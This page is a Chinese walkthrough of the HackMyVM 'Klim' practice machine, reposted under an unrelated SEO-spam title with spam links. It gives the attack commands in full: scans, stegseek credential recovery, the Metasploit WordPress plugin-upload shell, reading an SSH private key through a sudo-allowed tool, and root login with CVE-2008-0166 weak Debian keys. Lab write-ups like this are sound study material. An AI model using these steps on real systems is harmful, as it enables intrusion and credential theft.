当前位置: 首页 > news >正文

企业信息管理系统发展历程个人如何做seo推广

企业信息管理系统发展历程,个人如何做seo推广,公司转让网站源码,三足鼎立小程序开发公司目录 一、测试环境 1、系统环境 2、使用工具/软件 二、测试目的 三、操作过程 1、信息搜集 2、Getshell 3、提权 CVE-2008-0166 四、结论 一、测试环境 1、系统环境 渗透机:kali2021.1(192.168.159.127) 靶 机:debian(192.168.159.27) 注意事…

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

CVE-2008-0166

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.159.127)

靶  机:debian(192.168.159.27)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录扫描)、cmseek(获取cms信息)、stegseek(分析图片隐藏信息)、msfconsole(漏洞利用模块)、ssh(远程登录)

测试网址:http://192.168.159.27

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Klim

二、测试目的

熟悉wordpress漏洞,熟悉ssh登录流程,以及CVE-2008-0166漏洞利用。获取2个flag。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.159.27

物理机IP:192.168.159.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.159.27

靶机开放了22端口(ssh服务)、80端口(web服务)

目录扫描

gobuster dir -u http://192.168.159.27 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

有wordpress目录

扫描wordpress目录

gobuster dir -u http://192.168.159.27/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

扫描wordpress/wp-content目录,该目录存在uploads目录

查看wordpress信息

​cmseek -u http://192.168.159.27/wordpress

获取用户名klim

2、Getshell

在wordpress/wp-content/uploads目录中找到一张图片

获取该图片,查看是否有隐藏信息

stegseek image.jpg

可以看到,找到了密码,输出了文件,是有东西的

查看文件,发现是数据包,而且有klim用户的密码

cat image.jpg.out

klim/ss7WhrrnnHOZC%239bQn

数据包是经过url编码的,将密码解码

klim/ss7WhrrnnHOZC#9bQn

现在可以登录wordpress了

在Plugins—Add New Plugin—Upload Plugin处可以上传文件,直接上传木马会被拦

使用msfconsole模块集成利用,上传插件漏洞

use exploit/unix/webapp/wp_admin_shell_upload
set rhost 192.168.159.27
set targeturi /wordpress
set username klim
set password ss7WhrrnnHOZC#9bQn
run

成功返回meterpreter会话

3、提权

获取交互式shell并查看sudo权限

python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l

看到能以klim用户身份执行/home/klim/tool工具

使用file查看该文件,是一个可执行文件

file /home/klim/tool

使用help参数查看工具解析,可以看出这是cat命令,和cat命令一个作用

sudo -u klim /home/klim/tool --help

可以查看文件,那么首先查看klim用户家目录的文件

存在.ssh目录,查看私钥文件

ls -la /home/klim
sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa

将私钥写入id文件并ssh登录klim用户

vim id
chmod 600 id
ssh klim@192.168.159.27 -i id

在当前目录查看user.txt

cat user.txt

user.txt: 2fbef74059deaea1e5e11cff5a65b68e

CVE-2008-0166

基于Debian的操作系统上的OpenSSL 0.9.8c-1到0.9.8g-9之前的版本使用随机数生成器生成可预测的数字,这使得远程攻击者更容易对加密密钥进行暴力猜测攻击。

这个漏洞存在,生成的ssh密钥便可被预测,数量有限。所有ssh密钥对在如下地址下载:

https://github.com/g0tmi1k/debian-ssh/blob/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2

下载完成后,解压,可以在rsa/2048目录下查看所有公钥私钥

tar -xjf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
ls

利用该漏洞,需要找到公钥,然后根据公钥找到私钥

寻找公钥文件,发现在/opt目录下有个公钥文件,正是root用户的公钥文件

find / -name id_rs* -ls 2>/dev/null

根据公钥的加密信息去匹配已知公钥的编号

使用ssh登录,私钥指定为该编号即可

ssh root@192.168.159.27 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
cat root.txt

root.txt: 60667e12c8ea62295de82d053d950e1f

四、结论

Wordpress的文件上传漏洞可以利用,openssl的漏洞导致私钥可被查询出来。

http://www.hkea.cn/news/491323/

相关文章:

  • 做ppt音乐怎么下载网站企业培训课程有哪些
  • magento网站建设网站优化排名软件网站
  • 做生鲜食品最好的网站网络推广及销售
  • 销售管理系统需求分析长沙seo代理
  • 站长网站查询深圳百度关键字优化
  • 用net语言做网站平台好不好企业培训师资格证报考2022
  • 成都定制网站设竞价推广遇到恶意点击怎么办
  • 制作视频网站建设友链交易网
  • 做外贸是不是要有网站腾讯企点app下载安装
  • 网站开发快递文件国外网站怎么推广
  • 网站和搜索引擎站长论坛
  • 做违法网站会怎样外贸独立站怎么建站
  • 云主机建网站教程深圳全网推互联科技有限公司
  • 做网站赚50万谷歌搜索引擎363入口
  • 台州网站设计外包网页制作公司排名
  • 网站建设投标文件范本亚马逊提升关键词排名的方法
  • 学做网站需要多长时间免费推广平台排行
  • wordpress运行php 404360优化大师下载
  • seo排名网站 优帮云线上推广的三种方式
  • 平凉哪有做网站的百度推广登录入口官网网
  • 娄底网站优化自建网站平台有哪些
  • 做网站需要多少兆空间wix网站制作
  • 哪些网站教做生物实验今日新闻联播
  • 铜川市住房和城乡建设局网站信息流广告哪个平台好
  • 太原市建设交易中心网站首页百度手机助手app安卓版官方下载
  • 昆山网站建设网站建设郑州网络推广哪个好
  • 瑜伽网站设计国外推广网站
  • 什么网站做国外批发百度推广自己怎么做
  • 网站管理工具百度推广可以自己开户吗
  • 三水网站制作中山做网站推广公司